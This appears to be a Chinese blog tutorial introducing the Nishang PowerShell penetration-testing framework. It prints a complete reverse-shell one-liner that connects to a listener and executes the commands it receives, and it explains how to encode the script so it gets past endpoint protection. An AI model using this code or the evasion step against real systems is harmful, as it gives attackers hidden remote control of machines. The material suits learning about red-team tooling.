PowerShell渗透工具Nishang
目录
Nishang
Nishang的目录结构
Nishang的使用
Invoke-Decode.ps1
Nishang
Nishang是一个PowerShell脚本和有效载荷的框架和集合,它使PowerShell能够用于攻击安全性、渗透测试和红队。它是基于PowerShell的渗透测试专用工具,集成了框架、脚本和各种Payload,包括下载和执行、键盘记录、DNS、延时命令等脚本,被广泛用于渗透测试的各个阶段。Nishang在PowerShell3.0及以上的环境中才能正常使用,所以Windows7、Server2008下默认是有点小问题的。项目地址:https://github.com/samratashok/nishang
Nishang的目录结构
- ActiveDirectory:活动目录
- Antak-WebShell:WebShell
- Backdoors:后门
- Bypass:绕过
- Client:客户端
- Escalation:提权
- Execution:执行
- Gather:信息收集
- MITM:
- Misc:发音
- Pivot:跳板、远程执行exe
- Prasadhak:Virustotal
- Scan:扫描
- Shells:shell
- Utility:杂项
- Powerpreter:Meterpreter会话
Nishang的使用
导入所有的脚本到当前的PowerShell会话中(PowerShell v3之前)
Import-Module -verbose .\nishang.psm1
然后输入命令:Get-Command -Module nishang 查看nishang有哪些功能
Invoke-Decode.ps1
该脚本是Nishang的Utility目录下的,该脚本用于对payload进行编码。
例如,我们现在想利用powershell反弹shell。
我们在服务端使用powercat进行监听
我们在客户端的反弹shell的脚本如下,名为 reverse.ps1
$client = New-Object System.Net.Sockets.TCPClient('192.168.10.1',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
但是由于客户端机器存在防护,直接指向该脚本反弹不了shell。所以,我们现在就利用 Invoke-Encode.ps1脚本对reverse.ps1进行编码。执行完成后,会生成两个文件:encoded.txt 和 encodedcommand.txt,前者是编码的数据,后者是编码后的命令。
- Import-Module .\Invoke-Encode.ps1
- Invoke-Encode -DataToEncode .\reverse.ps1 -OutCommand
我们复制encodedcommand.txt 里面的命令,在powershell中执行,可以看到,反弹shell成功。
未完待续。。
PowerShell渗透工具Nishang相关推荐
- Powershell 渗透测试工具-Nishang
Powershell 渗透测试工具-Nishang 分享到: 作者:V1ct0r 稿费:500RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 传送门 ...
- arpspoof渗透工具使用方法详解+实战
目录 Arp渗透工具 arpspoof 工作原理简介 安装及使用 流程演示 1.找到开发经理的IP地址及网关的地址 2.将自己变成成网关 开启转发功能后,测试网络搜索正常 开发经理的信息 2.解析抓取 ...
- 渗透工具-白帽安全工程师Kali linux系统
渗透工具-白帽安全工程师Kali linux ubuntu 20.04 安装metasploit msfvenom常用生成 Payload 命令 2022 安装 Armitage 傻瓜渗透msf 介绍 ...
- 内网渗透工具Cobalt Strike 基础使用
Cobalt Strike:C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透. Cobalt Strike一款GUI的框架式渗透工具,集成了端口转发.服务扫描,自动 ...
- waf可以查看post请求吗_WAFNinja:一款绕过WAF的渗透工具
0x00 前言 在我们平时做渗透测试的时候,难免会遇到各种WAF的阻挡.这时一款良好的绕过WAF的渗透测试工具就显得很受渗透测人员欢迎,在这里我们推荐一款绕过WAF的实用渗透工具,希望对大家平时做渗透 ...
- 【内网渗透工具】炫彩蛇安装教程
点击查看[学习资料] Viper是一款图形化内网渗透工具,将内网渗透过程中常用的战术及技术进行模块化及武器化. Viper基础功能已集成杀软绕过,内网隧道,文件管理,增强命令行等基础功能. Viper ...
- 攻击者利用的Windows命令、横向渗透工具分析结果列表
横向渗透工具分析结果列表 https://jpcertcc.github.io/ToolAnalysisResultSheet/ 攻击者利用的Windows命令 https://blogs.jpcer ...
- 铭说 | 内网渗透工具分析——reGeorg
01 前言 通常情况下用户认为将数据和业务分离,只将业务A服务器对外开放,让数据服务器B不对外开放,那么即使用户的A服务器失陷,数据依然保存在内网中,不会被黑客直接访问.用户认为这种方式可以尽可能降低 ...
- 内网渗透-红队内网渗透工具(Viper)
最近发现一款很强大的内网渗透工具Viper 接下来我给大家介绍一下具体的安装过程,这里我在kali上进行安装 (1)首先打开kali终端,切换到root用户,确认以下操作都在root用户下操作,sud ...
最新文章
- 联邦学习,为何而生?
- 给 Spring Boot 项目减减肥!18.18M 到 0.18M 是如何做到的?
- Javascript 中的 Function对象
- 秒杀系统必须考虑的 3 个技术问题!
- 打开高效文本编辑之门_Linux Awk自定义变量与操作符
- mysql 执行查询_MySQL查询的执行过程
- 对vue-tree-select的封装
- 跑动大数据的笔记本配置_大数据说话|你比一般跑者跑得更快吗?
- Nvidia League Player:来呀比到天荒地老
- CVE-2020-15999:Chrome FreeType 字体库堆溢出原理分析
- 对待小事情和整理资料------开会心得
- office 在线浏览和编辑 部署 Office Web Apps Server
- Eclipse的.properties文件输出中文成unicode编码
- 特斯拉为什么不用激光雷达和高精地图?
- VC 6.0下载 VC 6.0英文版下载 Visual C++ 6.0 英文企业版 集成SP6完美版(最新更新地址,百度网盘)...
- 2021 年 8 月程序员工资出炉啦!北京以18904元位居榜首
- 经纬度转GeoHash
- 微信公众号展示页面模板
- 不小心删了sxos文件夹_SXOS误升级11.0.1降级教程进入打开正版系统教程
- 移动端H5页面生成图片解决方案